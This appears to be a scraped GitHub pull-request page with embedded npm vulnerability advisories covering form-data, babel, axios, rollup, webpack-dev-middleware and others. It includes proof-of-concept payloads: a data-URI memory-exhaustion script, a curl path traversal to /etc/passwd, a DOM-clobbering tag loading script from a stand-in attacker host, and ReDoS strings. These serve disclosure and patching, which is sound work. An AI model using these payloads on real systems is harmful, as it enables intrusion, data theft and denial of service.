You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
can observe other values produced by Math.random in the target application, and
can control one field of a request made using form-data
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
Impact
For an application to be vulnerable, it must:
Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.
If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
@babel/traverse7.23.0 (npm)
pkg:npm/%40babel/traverse@7.23.0
Incomplete List of Disallowed Inputs
Affected range
<7.23.2
Fixed version
7.23.2
CVSS Score
9.3
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Score
0.067%
EPSS Percentile
21st percentile
Description
Impact
Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()or path.evaluateTruthy() internal Babel methods.
Known affected plugins are:
@babel/plugin-transform-runtime
@babel/preset-env when using its useBuiltIns option
Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator
No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
Patches
The vulnerability has been fixed in @babel/traverse@7.23.2.
Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.
Workarounds
Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
can observe other values produced by Math.random in the target application, and
can control one field of a request made using form-data
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
Impact
For an application to be vulnerable, it must:
Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.
If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
Impact
Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
Allocation of Resources Without Limits or Throttling
Affected range
<1.12.0
Fixed version
1.12.0
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score
0.042%
EPSS Percentile
12th percentile
Description
Summary
When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
Details
The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.
constaxios=require('axios');asyncfunctionmain(){// this example decodes ~120 MBconstbase64Size=160_000_000;// 120 MB after decodingconstbase64='A'.repeat(base64Size);consturi='data:application/octet-stream;base64,'+base64;console.log('Generating URI with base64 length:',base64.length);constresponse=awaitaxios.get(uri,{responseType: 'arraybuffer'});console.log('Received bytes:',response.data.length);}main().catch(err=>{console.error('Error:',err.message);});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.
importexpressfrom"express";importmorganfrom"morgan";importaxiosfrom"axios";importhttpfrom"node:http";importhttpsfrom"node:https";import{PassThrough}from"node:stream";constkeepAlive=true;consthttpAgent=newhttp.Agent({ keepAlive,maxSockets: 100});consthttpsAgent=newhttps.Agent({ keepAlive,maxSockets: 100});constaxiosClient=axios.create({timeout: 10000,maxRedirects: 5,
httpAgent, httpsAgent,headers: {"User-Agent": "axios-poc-link-preview/0.1 (+node)"},validateStatus: c=>c>=200&&c<400});constapp=express();constPORT=Number(process.env.PORT||8081);constBODY_LIMIT=process.env.MAX_CLIENT_BODY||"50mb";app.use(express.json({limit: BODY_LIMIT}));app.use(morgan("combined"));app.get("/healthz",(req,res)=>res.send("ok"));/** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */app.post("/preview",async(req,res)=>{consturl=req.body?.url;if(!url)returnres.status(400).json({error: "missing url"});letu;try{u=newURL(String(url));}catch{returnres.status(400).json({error: "invalid url"});}// Developer allows using data:// in the allowlistconstallowed=newSet(["http:","https:","data:"]);if(!allowed.has(u.protocol))returnres.status(400).json({error: "unsupported scheme"});constcontroller=newAbortController();constonClose=()=>controller.abort();res.on("close",onClose);constbefore=process.memoryUsage().heapUsed;try{constr=awaitaxiosClient.get(u.toString(),{responseType: "stream",maxContentLength: 8*1024,// Axios will ignore this for data:maxBodyLength: 8*1024,// Axios will ignore this for data:signal: controller.signal});// stream only the first 64KB backconstcap=64*1024;letsent=0;constlimiter=newPassThrough();r.data.on("data",(chunk)=>{if(sent+chunk.length>cap){limiter.end();r.data.destroy();}else{sent+=chunk.length;limiter.write(chunk);}});r.data.on("end",()=>limiter.end());r.data.on("error",(e)=>limiter.destroy(e));constafter=process.memoryUsage().heapUsed;res.set("x-heap-increase-mb",((after-before)/1024/1024).toFixed(2));limiter.pipe(res);}catch(err){constafter=process.memoryUsage().heapUsed;res.set("x-heap-increase-mb",((after-before)/1024/1024).toFixed(2));res.status(502).json({error: String(err?.message||err)});}finally{res.off("close",onClose);}});app.listen(PORT,()=>{console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);});
Enforce size limits
For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.
Stream decoding
Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
Server-Side Request Forgery (SSRF)
Affected range
>=1.3.2 <=1.7.3
Fixed version
1.7.4
EPSS Score
0.179%
EPSS Percentile
40th percentile
Description
axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.
The regular expression that is vulnerable to backtracking can be generated in versions before 0.1.12 of path-to-regexp, originally reported in CVE-2024-45296
Patches
Upgrade to 0.1.12.
Workarounds
Avoid using two parameters within a single path segment, when the separator is not . (e.g. no /:a-:b). Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.
A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For example, /:a-:b.
Patches
For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0.
These versions add backtrack protection when a custom regex pattern is not provided:
They do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.
Version 7.1.0 can enable strict: true and get an error when the regular expression might be bad.
Version 8.0.0 removes the features that can cause a ReDoS.
Workarounds
All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change /:a-:b to /:a-:b([^-/]+).
If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.
Details
Using /:a-:b will produce the regular expression /^\/([^\/]+?)-([^\/]+?)\/?$/. This can be exploited by a path such as /a${'-a'.repeat(8_000)}/a. OWASP has a good example of why this occurs, but the TL;DR is the /a at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the :a-:b on the repeated 8,000 -a.
Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.
body-parser <1.20.3 is vulnerable to denial of service when url encoding is enabled. A malicious actor using a specially crafted payload could flood the server with a large number of requests, resulting in denial of service.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.
We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.
However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.
PoC
Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.
var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)
The output bundle.js is shown in the following code snippet.
'use strict';
var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
<!DOCTYPE html>
<html>
<head>
<title>rollup Example</title>
<!-- Attacker-controlled Script-less HTML Element starts--!>
<img name="currentScript" src="https://attacker.controlled.server/"></img>
<!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
Impact
This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.
Patch
Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<=5.3.3
Fixed version
5.3.4
CVSS Score
7.4
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
EPSS Score
0.218%
EPSS Percentile
44th percentile
Description
Summary
The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine.
A blank project can be created containing the following configuration file webpack.config.js: module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
When started, it is possible to access any local file, e.g. /etc/passwd: $ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
The developers using webpack-dev-server or webpack-dev-middleware are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).
If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, Allow-Access-Origin: * ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.
Recommendation
The URL should be unescaped and normalized before any further processing.
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
braces3.0.2 (npm)
pkg:npm/braces@3.0.2
Excessive Platform Resource Consumption within a Loop
Affected range
<3.0.3
Fixed version
3.0.3
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score
0.225%
EPSS Percentile
45th percentile
Description
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.
Versions of the package http-proxy-middleware before 2.0.7, from 3.0.0 and before 3.0.3 are vulnerable to Denial of Service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths.
nth-check1.0.2 (npm)
pkg:npm/nth-check@1.0.2
Inefficient Regular Expression Complexity
Affected range
<2.0.1
Fixed version
2.0.1
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score
0.115%
EPSS Percentile
31st percentile
Description
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
chande in docker file